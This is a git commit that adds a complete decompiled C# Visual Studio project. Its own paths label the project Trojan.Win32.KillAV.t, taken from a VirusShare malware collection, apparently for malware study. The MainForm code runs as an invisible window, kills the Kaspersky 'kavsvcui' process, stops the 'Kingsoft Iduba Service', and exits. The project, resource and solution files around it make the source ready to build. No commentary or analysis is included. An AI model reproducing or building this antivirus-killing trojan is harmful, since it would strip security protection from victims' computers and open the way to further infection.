auto-decompiled msil via petikvx

add
2026-06-21 10:19:23 +00:00 · 2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
@@ -0,0 +1,13 @@
+using System;
+using System.Reflection;
+using System.Runtime.InteropServices;
+
+[assembly: AssemblyTrademark("")]
+[assembly: Guid("8D3A3077-9631-4862-8265-9C2754933052")]
+[assembly: CLSCompliant(true)]
+[assembly: AssemblyProduct("")]
+[assembly: AssemblyCopyright("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyTitle("")]
+[assembly: AssemblyVersion("1.0.1074.17747")]
@@ -0,0 +1,187 @@
+// Decompiled with JetBrains decompiler
+// Type: ProcessController.WindowsApplication1.MainForm
+// Assembly: ProcessController, Version=1.0.1074.17747, Culture=neutral, PublicKeyToken=null
+// MVID: A7E7AFFD-A1DC-488C-AB9F-AD97FAEE0D10
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.KillAV.t-53998dd36d7386675343b9db1e5d7a198613fef641d5cfbb322386108a60238a.exe
+
+using Microsoft.VisualBasic.CompilerServices;
+using System;
+using System.Collections;
+using System.ComponentModel;
+using System.Diagnostics;
+using System.Drawing;
+using System.Resources;
+using System.Runtime.CompilerServices;
+using System.ServiceProcess;
+using System.Threading;
+using System.Windows.Forms;
+
+namespace ProcessController.WindowsApplication1
+{
+  public class MainForm : Form
+  {
+    [AccessedThroughProperty("OpenFile")]
+    private OpenFileDialog _OpenFile;
+    private IContainer components;
+    private string TempMachineName;
+    private Process SelectProcess;
+    private Hashtable Processes;
+    private System.Windows.Forms.Timer WatchDog;
+
+    internal virtual OpenFileDialog OpenFile
+    {
+      [MethodImpl(MethodImplOptions.Synchronized)] set
+      {
+        if (this._OpenFile == null)
+          ;
+        this._OpenFile = value;
+        if (this._OpenFile == null)
+          ;
+      }
+      get => this._OpenFile;
+    }
+
+    [STAThread]
+    public static void Main() => Application.Run((Form) new MainForm());
+
+    public MainForm()
+    {
+      this.Load += new EventHandler(this.MainForm_Load);
+      this.TempMachineName = Environment.MachineName;
+      this.Processes = new Hashtable();
+      this.WatchDog = new System.Windows.Forms.Timer();
+      this.InitializeComponent();
+    }
+
+    protected override void Dispose(bool disposing)
+    {
+      if (disposing && this.components != null)
+        this.components.Dispose();
+      base.Dispose(disposing);
+    }
+
+    private void InitializeComponent()
+    {
+      this.components = (IContainer) new System.ComponentModel.Container();
+      ResourceManager resourceManager = new ResourceManager(typeof (MainForm));
+      this.OpenFile = new OpenFileDialog();
+      this.AutoScale = false;
+      Size size = new Size(6, 14);
+      this.AutoScaleBaseSize = size;
+      size = new Size(0, 0);
+      this.ClientSize = size;
+      this.ControlBox = false;
+      this.FormBorderStyle = FormBorderStyle.None;
+      this.MaximizeBox = false;
+      this.Name = nameof (MainForm);
+      this.ShowInTaskbar = false;
+      this.SizeGripStyle = SizeGripStyle.Hide;
+      this.WindowState = FormWindowState.Minimized;
+    }
+
+    private void MainForm_Load(object sender, EventArgs e)
+    {
+      this.StopProcesses();
+      this.StopServices();
+      Application.Exit();
+    }
+
+    public void StopProcesses()
+    {
+      this.WatchDog.Enabled = false;
+      this.Processes.Clear();
+      this.Processes = new Hashtable();
+      try
+      {
+        Process[] processes = Process.GetProcesses(this.TempMachineName);
+        int index = 0;
+        while (index < processes.Length)
+        {
+          Process process = processes[index];
+          if (StringType.StrCmp(process.ProcessName.ToLower().Trim(), "kavsvcui", false) == 0)
+            process.Kill();
+          else
+            this.Processes.Add((object) process.Id.ToString(), (object) process);
+          checked { ++index; }
+        }
+      }
+      catch (Exception ex)
+      {
+        ProjectData.SetProjectError(ex);
+        ProjectData.ClearProjectError();
+      }
+      try
+      {
+        foreach (Process process in (IEnumerable) this.Processes.Values)
+        {
+          try
+          {
+            process.EnableRaisingEvents = true;
+          }
+          catch (Exception ex)
+          {
+            ProjectData.SetProjectError(ex);
+            ProjectData.ClearProjectError();
+          }
+        }
+      }
+      finally
+      {
+        IEnumerator enumerator;
+        if (enumerator is IDisposable)
+          ((IDisposable) enumerator).Dispose();
+      }
+      this.WatchDog.Enabled = true;
+      this.Processes.Clear();
+    }
+
+    public void StopServices()
+    {
+      try
+      {
+        ServiceController[] services = ServiceController.GetServices(this.TempMachineName);
+        int index = 0;
+        while (index < services.Length)
+        {
+          ServiceController serviceController = services[index];
+          object lower = (object) serviceController.DisplayName.Trim().ToLower();
+          if (serviceController.Status == ServiceControllerStatus.Running)
+          {
+            if (ObjectType.ObjTst(lower, (object) "kingsoft iduba service", false) == 0)
+            {
+              try
+              {
+                if (serviceController.CanStop)
+                {
+                  try
+                  {
+                    serviceController.Stop();
+                    Thread.Sleep(500);
+                    while (serviceController.Status == ServiceControllerStatus.StopPending)
+                      Application.DoEvents();
+                  }
+                  catch (Exception ex)
+                  {
+                    ProjectData.SetProjectError(ex);
+                    ProjectData.ClearProjectError();
+                  }
+                }
+              }
+              catch (Exception ex)
+              {
+                ProjectData.SetProjectError(ex);
+                ProjectData.ClearProjectError();
+              }
+            }
+          }
+          checked { ++index; }
+        }
+      }
+      catch (Exception ex)
+      {
+        ProjectData.SetProjectError(ex);
+        ProjectData.ClearProjectError();
+      }
+    }
+  }
+}
@@ -0,0 +1,144 @@
+<?xml version="1.0" encoding="utf-8"?>
+<root>
+  <!-- 
+    Microsoft ResX Schema 
+    
+    Version 2.0
+    
+    The primary goals of this format is to allow a simple XML format 
+    that is mostly human readable. The generation and parsing of the 
+    various data types are done through the TypeConverter classes 
+    associated with the data types.
+    
+    Example:
+    
+    ... ado.net/XML headers & schema ...
+    <resheader name="resmimetype">text/microsoft-resx</resheader>
+    <resheader name="version">2.0</resheader>
+    <resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
+    <resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
+    <data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
+    <data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
+    <data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
+        <value>[base64 mime encoded serialized .NET Framework object]</value>
+    </data>
+    <data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
+        <value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
+        <comment>This is a comment</comment>
+    </data>
+                
+    There are any number of "resheader" rows that contain simple 
+    name/value pairs.
+    
+    Each data row contains a name, and value. The row also contains a 
+    type or mimetype. Type corresponds to a .NET class that support 
+    text/value conversion through the TypeConverter architecture. 
+    Classes that don't support this are serialized and stored with the 
+    mimetype set.
+    
+    The mimetype is used for serialized objects, and tells the 
+    ResXResourceReader how to depersist the object. This is currently not 
+    extensible. For a given mimetype the value must be set accordingly:
+    
+    Note - application/x-microsoft.net.object.binary.base64 is the format 
+    that the ResXResourceWriter will generate, however the reader can 
+    read any of the formats listed below.
+    
+    mimetype: application/x-microsoft.net.object.binary.base64
+    value   : The object must be serialized with 
+            : System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
+            : and then encoded with base64 encoding.
+    
+    mimetype: application/x-microsoft.net.object.soap.base64
+    value   : The object must be serialized with 
+            : System.Runtime.Serialization.Formatters.Soap.SoapFormatter
+            : and then encoded with base64 encoding.
+
+    mimetype: application/x-microsoft.net.object.bytearray.base64
+    value   : The object must be serialized into a byte array 
+            : using a System.ComponentModel.TypeConverter
+            : and then encoded with base64 encoding.
+    -->
+  <xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
+    <xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
+    <xsd:element name="root" msdata:IsDataSet="true">
+      <xsd:complexType>
+        <xsd:choice maxOccurs="unbounded">
+          <xsd:element name="metadata">
+            <xsd:complexType>
+              <xsd:sequence>
+                <xsd:element name="value" type="xsd:string" minOccurs="0" />
+              </xsd:sequence>
+              <xsd:attribute name="name" use="required" type="xsd:string" />
+              <xsd:attribute name="type" type="xsd:string" />
+              <xsd:attribute name="mimetype" type="xsd:string" />
+              <xsd:attribute ref="xml:space" />
+            </xsd:complexType>
+          </xsd:element>
+          <xsd:element name="assembly">
+            <xsd:complexType>
+              <xsd:attribute name="alias" type="xsd:string" />
+              <xsd:attribute name="name" type="xsd:string" />
+            </xsd:complexType>
+          </xsd:element>
+          <xsd:element name="data">
+            <xsd:complexType>
+              <xsd:sequence>
+                <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
+                <xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
+              </xsd:sequence>
+              <xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
+              <xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
+              <xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
+              <xsd:attribute ref="xml:space" />
+            </xsd:complexType>
+          </xsd:element>
+          <xsd:element name="resheader">
+            <xsd:complexType>
+              <xsd:sequence>
+                <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
+              </xsd:sequence>
+              <xsd:attribute name="name" type="xsd:string" use="required" />
+            </xsd:complexType>
+          </xsd:element>
+        </xsd:choice>
+      </xsd:complexType>
+    </xsd:element>
+  </xsd:schema>
+  <resheader name="resmimetype">
+    <value>text/microsoft-resx</value>
+  </resheader>
+  <resheader name="version">
+    <value>2.0</value>
+  </resheader>
+  <resheader name="reader">
+    <value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
+  </resheader>
+  <resheader name="writer">
+    <value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
+  </resheader>
+  <data name="$this.Name" mimetype="application/x-microsoft.net.object.binary.base64">
+    <value>CE1haW5Gb3Jt</value>
+  </data>
+  <data name="$this.DrawGrid" mimetype="application/x-microsoft.net.object.binary.base64">
+    <value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAAs=</value>
+  </data>
+  <data name="OpenFile.Modifiers" mimetype="application/x-microsoft.net.object.binary.base64">
+    <value>AAEAAAD/////AQAAAAAAAAAMAgAAAExTeXN0ZW0sIFZlcnNpb249MS4wLjMzMDAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAAAfU3lzdGVtLkNvZGVEb20uTWVtYmVyQXR0cmlidXRlcwEAAAAHdmFsdWVfXwAIAgAAAAAQAAAL</value>
+  </data>
+  <data name="$this.TrayHeight" mimetype="application/x-microsoft.net.object.binary.base64">
+    <value>GQAAAA==</value>
+  </data>
+  <data name="NotifyIcon1.Icon" mimetype="application/x-microsoft.net.object.binary.base64">
+    <value>AAEAAAD/////AQAAAAAAAAAMAgAAAFRTeXN0ZW0uRHJhd2luZywgVmVyc2lvbj0xLjAuMzMwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EFAQAAABNTeXN0ZW0uRHJhd2luZy5JY29uAgAAAAhJY29uRGF0YQhJY29uU2l6ZQcEAhNTeXN0ZW0uRHJhd2luZy5TaXplAgAAAAIAAAAJAwAAAAX8////E1N5c3RlbS5EcmF3aW5nLlNpemUCAAAABXdpZHRoBmhlaWdodAAACAgCAAAAAAAAAAAAAAAPAwAAAD4BAAACAAABAAEAEBAQAAEABAAoAQAAFgAAACgAAAAQAAAAIAAAAAEABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAACAAAAAgIAAgAAAAIAAgACAgAAAwMDAAICAgAAAAP8AAP8AAAD//wD/AAAA/wD/AP//AAD///8AAAAAAAAAAAAAAAD/8AAAAAAADwAPAAAAAADwmZDwAAAADwmf8Q8AAADwGZ/5EPAAAPAZn/kQ8AAA8Jmf+RDwAADw////8PAAAPD////w8AAA8Bmf+RDwAADwmZ/5EPAAAPAQAAAQ8AAA/w///wDwAAAP/wAP/wAAAAAAAAAAAAD8fwAA+D8AAPAfAADgDwAAwAcAAIADAACAAwAAgAMAAIADAACAAwAAgAMAAIADAACAAwAAgAMAAMAHAADjjwAACw==</value>
+  </data>
+  <data name="NotifyIcon1.Modifiers" mimetype="application/x-microsoft.net.object.binary.base64">
+    <value>AAEAAAD/////AQAAAAAAAAAMAgAAAExTeXN0ZW0sIFZlcnNpb249MS4wLjMzMDAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAAAfU3lzdGVtLkNvZGVEb20uTWVtYmVyQXR0cmlidXRlcwEAAAAHdmFsdWVfXwAIAgAAAAAQAAAL</value>
+  </data>
+  <data name="NotifyIcon1.Location" mimetype="application/x-microsoft.net.object.binary.base64">
+    <value>AAEAAAD/////AQAAAAAAAAAMAgAAAFRTeXN0ZW0uRHJhd2luZywgVmVyc2lvbj0xLjAuMzMwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EFAQAAABRTeXN0ZW0uRHJhd2luZy5Qb2ludAIAAAABeAF5AAAICAIAAAB2AAAAEQAAAAs=</value>
+  </data>
+  <data name="OpenFile.Location" mimetype="application/x-microsoft.net.object.binary.base64">
+    <value>AAEAAAD/////AQAAAAAAAAAMAgAAAFRTeXN0ZW0uRHJhd2luZywgVmVyc2lvbj0xLjAuMzMwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EFAQAAABRTeXN0ZW0uRHJhd2luZy5Qb2ludAIAAAABeAF5AAAICAIAAAARAAAAEQAAAAs=</value>
+  </data>
+</root>
@@ -0,0 +1,51 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.KillAV.t-53998dd36d7386675343b9db1e5d7a198613fef641d5cfbb322386108a60238a.exe-->
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{2C36617A-7A03-437D-BDE0-6927AEAD0E4C}</ProjectGuid>
+    <OutputType>WinExe</OutputType>
+    <AssemblyName>ProcessController</AssemblyName>
+    <ApplicationVersion>1.0.1074.17747</ApplicationVersion>
+    <RootNamespace>ProcessController.WindowsApplication1</RootNamespace>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="Microsoft.VisualBasic" />
+    <Reference Include="System" />
+    <Reference Include="System.Data" />
+    <Reference Include="System.DirectoryServices" />
+    <Reference Include="System.Drawing" />
+    <Reference Include="System.Management" />
+    <Reference Include="System.ServiceProcess" />
+    <Reference Include="System.Windows.Forms" />
+    <Reference Include="System.Xml" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="MainForm.cs" />
+    <Compile Include="AssemblyInfo.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <EmbeddedResource Include="MainForm.resx" />
+  </ItemGroup>
+  <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+</Project>
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ProcessController", "Trojan.Win32.KillAV.t-53998dd36d7386675343b9db1e5d7a198613fef641d5cfbb322386108a60238a.csproj", "{2C36617A-7A03-437D-BDE0-6927AEAD0E4C}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{2C36617A-7A03-437D-BDE0-6927AEAD0E4C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{2C36617A-7A03-437D-BDE0-6927AEAD0E4C}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{2C36617A-7A03-437D-BDE0-6927AEAD0E4C}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{2C36617A-7A03-437D-BDE0-6927AEAD0E4C}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal